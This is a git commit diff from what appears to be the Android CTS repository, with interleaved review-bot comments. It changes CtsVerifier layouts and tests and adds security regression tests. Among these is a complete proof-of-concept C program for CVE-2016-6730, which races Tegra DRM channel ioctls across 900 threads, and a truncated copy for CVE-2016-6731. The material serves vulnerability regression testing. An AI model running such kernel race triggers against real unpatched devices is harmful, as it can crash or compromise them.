Merge "Merge "Merge "Merge "Use fix iteration numbers in tuning stress test" into marshmallow-cts-dev am: acb676213a" into nougat-cts-dev am: 57a2ed7106" into nougat-mr1-cts-dev am: f3967b1ebb"
am: 2b214fe27c
Change-Id: I0aba8c0aed2aeeceb14d520738ae76aca7599767
diff --git a/.gitignore b/.gitignore
index 07a80d6..dbd5bcf 100644
--- a/.gitignore
+++ b/.gitignore
@@ -7,3 +7,5 @@
/bin
.idea/*
.idea/
+gen/
+*.iml
diff --git a/apps/CtsVerifier/Android.mk b/apps/CtsVerifier/Android.mk
index b1c0ebf..5c36794 100644
--- a/apps/CtsVerifier/Android.mk
+++ b/apps/CtsVerifier/Android.mk
@@ -26,7 +26,6 @@
LOCAL_SRC_FILES := $(call all-java-files-under, src) $(call all-Iaidl-files-under, src)
LOCAL_STATIC_JAVA_LIBRARIES := android-ex-camera2 \
- android-support-v4 \
compatibility-common-util-devicesidelib \
cts-sensors-tests \
cts-location-tests \
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index cc62cef..27bbe61 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="7.1_r2">
+ android:versionName="7.1_r201703s">
<uses-sdk android:minSdkVersion="19" android:targetSdkVersion="25"/>
diff --git a/apps/CtsVerifier/res/layout-round/provisioning_byod.xml b/apps/CtsVerifier/res/layout-round/provisioning_byod.xml
new file mode 100644
index 0000000..d2b6e0e
--- /dev/null
+++ b/apps/CtsVerifier/res/layout-round/provisioning_byod.xml
@@ -0,0 +1,42 @@
+<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2016 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+<android.support.v4.widget.NestedScrollView xmlns:android="http://schemas.android.com/apk/res/android"
+ android:id="@+id/main_layout"
+ style="@style/RootLayoutPadding"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+
+ <LinearLayout
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <TextView
+ android:id="@+id/test_instructions"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:padding="10dip"/>
+ <Button
+ android:id="@+id/prepare_test_button"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"/>
+ <ListView
+ android:id="@+id/android:list"
+ android:layout_width="match_parent"
+ android:layout_height="0dip"
+ android:layout_weight="3"/>
+ <include layout="@layout/pass_fail_buttons"/>
+ </LinearLayout>
+</android.support.v4.widget.NestedScrollView>
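Review bot: The root element `android.support.v4.widget.NestedScrollView` comes from the support-v4 library, yet this same commit removes `android-support-v4` from LOCAL_STATIC_JAVA_LIBRARIES in apps/CtsVerifier/Android.mk. Unless the class still arrives through one of the remaining static libraries, inflating this layout on a round device would fail at runtime, so the dependency should be confirmed or restored. `android:orientation="vertical"` on the root has no meaning for a scroll view and can be dropped. The ListView with `android:layout_height="0dip"` sits inside a scrolling parent, so its visible height is worth checking on a real round device.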
diff --git a/apps/CtsVerifier/res/layout/provisioning_byod.xml b/apps/CtsVerifier/res/layout/provisioning_byod.xml
index fb4093a..227d8d8 100644
--- a/apps/CtsVerifier/res/layout/provisioning_byod.xml
+++ b/apps/CtsVerifier/res/layout/provisioning_byod.xml
@@ -1,42 +1,37 @@
<?xml version="1.0" encoding="utf-8"?><!-- Copyright (C) 2011 The Android Open Source Project
-
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
-
http://www.apache.org/licenses/LICENSE-2.0
-
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
-<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
- style="@style/RootLayoutPadding"
+<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
- android:layout_height="match_parent">
-
- <LinearLayout
+ android:layout_height="match_parent"
+ android:orientation="vertical">
+ <ScrollView
android:layout_width="match_parent"
- android:layout_height="match_parent"
- android:orientation="vertical">
+ android:layout_height="wrap_content"
+ android:layout_weight="2">
<TextView
android:id="@+id/test_instructions"
android:layout_width="match_parent"
android:layout_height="wrap_content"
android:padding="10dip"
- android:textSize="18dip" />
- <Button
- android:id="@+id/prepare_test_button"
- android:layout_width="match_parent"
- android:layout_height="wrap_content" />
-
- <ListView
- android:id="@+id/android:list"
- android:layout_width="match_parent"
- android:layout_height="wrap_content" />
-
- <include layout="@layout/pass_fail_buttons" />
- </LinearLayout>
-</ScrollView>
+ android:textSize="18dip"/>
+ </ScrollView>
+ <Button
+ android:id="@+id/prepare_test_button"
+ android:layout_width="204dip"
+ android:layout_height="wrap_content"/>
+ <ListView
+ android:id="@+id/android:list"
+ android:layout_width="match_parent"
+ android:layout_height="wrap_content"
+ android:layout_weight="3"/>
+ <include layout="@layout/pass_fail_buttons"/>
+</LinearLayout>
diff --git a/apps/CtsVerifier/res/layout/pwa_widgets.xml b/apps/CtsVerifier/res/layout/pwa_widgets.xml
index e5ebddb..cb611b9 100644
--- a/apps/CtsVerifier/res/layout/pwa_widgets.xml
+++ b/apps/CtsVerifier/res/layout/pwa_widgets.xml
@@ -12,19 +12,16 @@
See the License for the specific language governing permissions and
limitations under the License.
-->
-<LinearLayout xmlns:android="http://schemas.android.com/apk/res/android"
+<RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android"
android:layout_width="match_parent"
android:layout_height="match_parent">
- <TextureView
- android:id="@+id/texture_view"
- android:layout_width="match_parent"
- android:layout_height="match_parent" />
-
<LinearLayout
+ android:id="@+id/test_controls"
android:layout_width="fill_parent"
android:layout_height="wrap_content"
- android:orientation="vertical">
+ android:orientation="vertical"
+ android:layout_gravity="top">
<LinearLayout
android:layout_width="match_parent"
@@ -55,4 +52,10 @@
</LinearLayout>
</LinearLayout>
-</LinearLayout>
+ <TextureView
+ android:id="@+id/texture_view"
+ android:layout_width="match_parent"
+ android:layout_height="match_parent"
+ android:layout_below="@id/test_controls" />
+
+</RelativeLayout>
diff --git a/apps/CtsVerifier/res/values-watch/strings.xml b/apps/CtsVerifier/res/values-watch/strings.xml
index 1f25b04..6f1470c 100644
--- a/apps/CtsVerifier/res/values-watch/strings.xml
+++ b/apps/CtsVerifier/res/values-watch/strings.xml
@@ -19,4 +19,9 @@
<item>com.android.cts.verifier.notifications.NotificationAttentionManagementVerifierActivity</item>
<item>com.android.cts.verifier.notifications.NotificationListenerVerifierActivity</item>
</string-array>
-</resources>
\ No newline at end of file
+
+ <string name="snsr_device_suspend_test_instr">Once you begin the test, disconnect USB, then
+ perform a palm press to turn off display and put device into suspend mode. The screen will
+ turn on and device will vibrate once all the tests are completed.
+ </string>
+</resources>
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
index 167fd84..6933ef4 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/DialogTestListActivity.java
@@ -21,10 +21,12 @@
import android.content.Context;
import android.content.DialogInterface;
import android.content.Intent;
+import android.content.pm.PackageManager;
import android.database.DataSetObserver;
import android.os.Bundle;
import android.util.Log;
import android.view.LayoutInflater;
+import android.view.MotionEvent;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
@@ -49,6 +51,7 @@
private final int mInstructionsStringId;
protected Button mPrepareTestButton;
+ protected ListView mTestFeaturesList;
protected int mCurrentTestPosition;
@@ -85,15 +88,31 @@
mCurrentTestPosition = 0;
- TextView instructionTextView = (TextView)findViewById(R.id.test_instructions);
+ TextView instructionTextView = (TextView) findViewById(R.id.test_instructions);
instructionTextView.setText(mInstructionsStringId);
- mPrepareTestButton = (Button)findViewById(R.id.prepare_test_button);
+ mPrepareTestButton = (Button) findViewById(R.id.prepare_test_button);
+ mTestFeaturesList = (ListView) findViewById(android.R.id.list);
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH)) {
+ mTestFeaturesList.setOnTouchListener((View v, MotionEvent e) -> {
+ switch (e.getAction()) {
+ case MotionEvent.ACTION_DOWN:
+ v.getParent().requestDisallowInterceptTouchEvent(true);
+ break;
+ case MotionEvent.ACTION_UP:
+ v.getParent().requestDisallowInterceptTouchEvent(false);
+ break;
+ default:
+ }
+ return false;
+ });
+ }
}
/**
* Subclasses must add their tests items to the provided adapter(usually instances of
* {@link DialogTestListItem} or {@link DialogTestListItemWithIcon} but any class deriving from
* {@link TestListAdapter.TestListItem} will do).
+ *
* @param adapter The adapter to add test items to.
*/
protected abstract void setupTests(ArrayTestListAdapter adapter);
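Review bot: The watch-only touch listener added at the end of this method has no comment saying why the parent must be stopped from intercepting touches. Presumably it is because the round layout nests the ListView inside a scrolling parent. Suggest `// On watches the list is nested in a scrolling parent; keep the parent from stealing the drag so the list can scroll.` above the `if`. The switch releases the flag only on ACTION_UP, so `case MotionEvent.ACTION_CANCEL:` should share that branch, and the empty `default:` can go. The method body starts outside this hunk.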
@@ -165,7 +184,7 @@
.getItem(position);
if (test instanceof DialogTestListItem) {
mCurrentTestPosition = position;
- ((DialogTestListItem)test).performTest(this);
+ ((DialogTestListItem) test).performTest(this);
} else {
try {
super.handleItemClick(l, v, position, id);
@@ -180,6 +199,7 @@
/**
* Start a test's manual intent
+ *
* @param test The test the manual intent of which is to be started.
* @return true if activity could be started successfully, false otherwise.
*/
@@ -218,6 +238,7 @@
public interface TestCallback {
void onPass();
+
void onFail();
}
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
index 52151aa..31a8791 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/managedprovisioning/KeyguardDisabledFeaturesActivity.java
@@ -21,6 +21,8 @@
import android.content.ComponentName;
import android.content.Context;
import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.content.pm.ResolveInfo;
import android.hardware.fingerprint.FingerprintManager;
import android.os.Bundle;
import android.provider.Settings;
@@ -32,6 +34,8 @@
import com.android.cts.verifier.DialogTestListActivity;
import com.android.cts.verifier.R;
+import java.util.List;
+
public class KeyguardDisabledFeaturesActivity extends DialogTestListActivity {
protected DevicePolicyManager mDpm;
@@ -131,11 +135,20 @@
@Override
protected void setupTests(ArrayTestListAdapter adapter) {
- setupDisableTrustAgentsTest(adapter);
+ if (hasTrustAgents()) {
+ setupDisableTrustAgentsTest(adapter);
+ }
setupDisableUnredactedWorkNotification(adapter);
setupFingerprintTests(adapter);
}
+ private boolean hasTrustAgents() {
+ PackageManager packageManager = getPackageManager();
+ Intent intent = new Intent("android.service.trust.TrustAgentService");
+ List<ResolveInfo> resolveInfos = packageManager.queryIntentServices(intent, 0);
+ return resolveInfos.size() > 0;
+ }
+
@Override
protected void clearRemainingState(final DialogTestListItem test) {
super.clearRemainingState(test);
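Review bot: hasTrustAgents() dereferences the result of `queryIntentServices(intent, 0)` without a null check, and older PackageManager documentation allows a null return when nothing matches; `return resolveInfos != null && !resolveInfos.isEmpty();` is safer. More importantly, when the query comes back empty the trust-agent item is silently left out in setupTests(). A device where the lookup is empty for another reason (for example agents that are currently disabled, which flags `0` does not match) would then pass without this keyguard policy being exercised. A short comment on hasTrustAgents() stating that, and a log line when the test is skipped, would make the gap visible to whoever reads the verifier result.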
diff --git a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
index 7ef63d7..b7d9617 100644
--- a/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
+++ b/apps/CtsVerifier/src/com/android/cts/verifier/sensors/BatchingTestActivity.java
@@ -19,6 +19,7 @@
import com.android.cts.verifier.R;
import com.android.cts.verifier.sensors.base.SensorCtsVerifierTestActivity;
+import android.content.pm.PackageManager;
import android.hardware.Sensor;
import android.hardware.SensorManager;
import android.hardware.cts.helpers.TestSensorEnvironment;
@@ -82,6 +83,9 @@
@SuppressWarnings("unused")
public String testProximity_batching() throws Throwable {
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {
+ return null;
+ }
return runBatchTest(
Sensor.TYPE_PROXIMITY,
REPORT_LATENCY_10_SEC,
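Review bot: The new guard in testProximity_batching() returns early when `hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)` is true, so it skips the test on exactly the devices that declare a proximity sensor. If the aim is to skip devices without one, the condition needs negating: `if (!getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {`. The identical guard in testProximity_flush() in the next hunk has the same problem. It is also not visible here how the caller treats a `null` return; if it is recorded as a pass, the skip should be reported explicitly instead.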
@@ -90,6 +94,9 @@
@SuppressWarnings("unused")
public String testProximity_flush() throws Throwable {
+ if (getPackageManager().hasSystemFeature(PackageManager.FEATURE_SENSOR_PROXIMITY)) {
+ return null;
+ }
return runFlushTest(
Sensor.TYPE_PROXIMITY,
REPORT_LATENCY_10_SEC,
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 0056e81..cd68c69 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -14,6 +14,38 @@
limitations under the License.
-->
<configuration description="Config for the CTS Security host tests">
+ <target_preparer class="com.android.compatibility.common.tradefed.targetprep.FilePusher">
+ <option name="cleanup" value="true" />
+ <option name="push" value="CVE-2016-8412->/data/local/tmp/CVE-2016-8412" />
+ <option name="push" value="CVE-2016-8444->/data/local/tmp/CVE-2016-8444" />
+ <option name="push" value="CVE-2016-8448->/data/local/tmp/CVE-2016-8448" />
+ <option name="push" value="CVE-2016-8449->/data/local/tmp/CVE-2016-8449" />
+ <option name="push" value="CVE-2016-8460->/data/local/tmp/CVE-2016-8460" />
+ <option name="push" value="CVE-2017-0403->/data/local/tmp/CVE-2017-0403" />
+ <option name="push" value="CVE-2017-0404->/data/local/tmp/CVE-2017-0404" />
+ <option name="push" value="CVE-2016-8482->/data/local/tmp/CVE-2016-8482" />
+ <option name="push" value="CVE-2017-0429->/data/local/tmp/CVE-2017-0429" />
+ <option name="push" value="CVE-2016-6730->/data/local/tmp/CVE-2016-6730" />
+ <option name="push" value="CVE-2016-6731->/data/local/tmp/CVE-2016-6731" />
+ <option name="push" value="CVE-2016-6732->/data/local/tmp/CVE-2016-6732" />
+ <option name="push" value="CVE-2016-6733->/data/local/tmp/CVE-2016-6733" />
+ <option name="push" value="CVE-2016-6734->/data/local/tmp/CVE-2016-6734" />
+ <option name="push" value="CVE-2016-6735->/data/local/tmp/CVE-2016-6735" />
+ <option name="push" value="CVE-2016-6736->/data/local/tmp/CVE-2016-6736" />
+ <option name="push" value="CVE-2016-8424->/data/local/tmp/CVE-2016-8424" />
+ <option name="push" value="CVE-2016-8425->/data/local/tmp/CVE-2016-8425" />
+ <option name="push" value="CVE-2016-8426->/data/local/tmp/CVE-2016-8426" />
+ <option name="push" value="CVE-2016-8427->/data/local/tmp/CVE-2016-8427" />
+ <option name="push" value="CVE-2016-8428->/data/local/tmp/CVE-2016-8428" />
+ <option name="push" value="CVE-2016-8429->/data/local/tmp/CVE-2016-8429" />
+ <option name="push" value="CVE-2016-8430->/data/local/tmp/CVE-2016-8430" />
+ <option name="push" value="CVE-2016-8431->/data/local/tmp/CVE-2016-8431" />
+ <option name="push" value="CVE-2016-8432->/data/local/tmp/CVE-2016-8432" />
+ <option name="push" value="CVE-2016-8434->/data/local/tmp/CVE-2016-8434" />
+ <option name="push" value="CVE-2016-8435->/data/local/tmp/CVE-2016-8435" />
+ <option name="push" value="CVE-2016-9120->/data/local/tmp/CVE-2016-9120" />
+ <option name="append-bitness" value="true" />
+ </target_preparer>
<test class="com.android.compatibility.common.tradefed.testtype.JarHostTest" >
<option name="jar" value="CtsSecurityHostTestCases.jar" />
<option name="runtime-hint" value="32s" />
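Review bot: The 28 `push` entries are not in CVE order (2017-0403/0404 sit between 2016-8460 and 2016-8482, and the 2016-67xx block follows 2017-0429), which makes a missing or duplicated binary hard to spot in review; sorting them would help. With `append-bitness` set, each entry presumably resolves to the `<name>32`/`<name>64` stems that the modules define through LOCAL_MODULE_STEM_32/64, so every entry needs a matching module in the build. A comment above the preparer would record that contract, e.g. `<!-- One entry per module under securityPatch/; pushed binaries are removed after the run (cleanup=true). -->`.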
diff --git a/hostsidetests/security/securityPatch/Android.mk b/hostsidetests/security/securityPatch/Android.mk
new file mode 100644
index 0000000..41a41d0
--- /dev/null
+++ b/hostsidetests/security/securityPatch/Android.mk
@@ -0,0 +1,17 @@
+#
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+include $(call all-subdir-makefiles)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
new file mode 100644
index 0000000..14337ab
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6730
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
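Review bot: The warning and hardening flags are appended to `CFLAGS` and `LDFLAGS`, which the Android.mk build does not treat as per-module settings; `LOCAL_CFLAGS` and `LOCAL_LDFLAGS` are the variables that are applied to the module and reset by `$(CLEAR_VARS)`. As written, `-Wall`, `-D_FORTIFY_SOURCE=2` and the rest are likely not in effect for poc.c, and the plain variables keep accumulating across every makefile pulled in through `all-subdir-makefiles`. Use `LOCAL_CFLAGS += ...` for the four flag lines and either drop `LDFLAGS += -rdynamic` or move it to `LOCAL_LDFLAGS`. The Android.mk files for CVE-2016-6731 and CVE-2016-6732 repeat the same lines.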
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
new file mode 100644
index 0000000..bfcdb41
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6730/poc.c
@@ -0,0 +1,164 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE 0x40
+#define DRM_COMMAND_END 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL 0x05
+#define DRM_TEGRA_CLOSE_CHANNEL 0x06
+#define DRM_TEGRA_GET_CLK_CONSTRAINT 0x12
+struct drm_tegra_open_channel {
+ __u32 client;
+ __u32 pad;
+ volatile __u64 context;
+};
+
+struct drm_tegra_close_channel {
+ volatile __u64 context;
+};
+
+struct drm_tegra_constraint {
+ __u64 context;
+ __u32 index;
+ __u32 type;
+ __u32 rate;
+ __u32 pad;
+};
+
+#define DRM_IOCTL_BASE 'd'
+#define DRM_IOWR(nr,type) _IOWR(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GET_CLK_CONSTRAINT, struct drm_tegra_constraint)
+int fd;
+pthread_t clk_thread_id[CLK_THREAD_NUM] = { 0 };
+
+volatile struct drm_tegra_open_channel open_c = { 0 };
+volatile struct drm_tegra_close_channel close_c = { 0 };
+volatile struct drm_tegra_constraint clk_c = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ }
+ return ret;
+}
+
+static void prepare()
+{
+ open_c.client = HOST1X_CLASS_VIC;
+}
+
+void* clk_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(1){
+ ioctl(fd, DRM_IOCTL_TEGRA_GET_CLK_CONSTRAINT, &clk_c);
+ }
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV,O_RDONLY);
+ if(fd == -1){
+ return 0;
+ }
+
+ /* prepare ioctl cmd */
+ prepare();
+
+ /* create clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ ret = pthread_create(clk_thread_id + i, NULL, clk_thread, NULL);
+ if(ret){
+ goto out_clk_thread;
+ }
+ }
+
+ while(try_time){
+ /* open */
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+ if(ret == 0){
+ try_time--;
+ /* set clk */
+ clk_c.context = open_c.context;
+ /* set close */
+ close_c.context = open_c.context;
+ usleep(500);
+ ret = ioctl(fd, DRM_IOCTL_TEGRA_CLOSE_CHANNEL, &close_c);
+ }
+ }
+
+out_clk_thread:
+ /* kill clk thread */
+ for(i = 0; i < CLK_THREAD_NUM; i++){
+ pthread_kill(clk_thread_id[i], SIGKILL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
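Review bot: The `while(try_time)` loop in main() decrements `try_time` only when DRM_IOCTL_TEGRA_OPEN_CHANNEL succeeds, so on a device where that ioctl is rejected the binary never exits and the host test can only end by timeout. Counting attempts instead of successes bounds the run: move `try_time--;` to the top of the loop body, outside `if(ret == 0)`. The same loop is in CVE-2016-6731/poc.c. Separately, main() returns 0 on every path, including when `open(DEV,O_RDONLY)` fails, so the exit status cannot tell the caller whether the driver was exercised at all; a distinct exit code for the not-applicable case would make results easier to interpret.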
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
new file mode 100644
index 0000000..718dbe3
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-6731
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
new file mode 100644
index 0000000..d6cedfb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-6731/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define CLK_THREAD_NUM 900
+#define TRY_TIMES CLK_THREAD_NUM
+#define DEV "/dev/dri/renderD129"
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
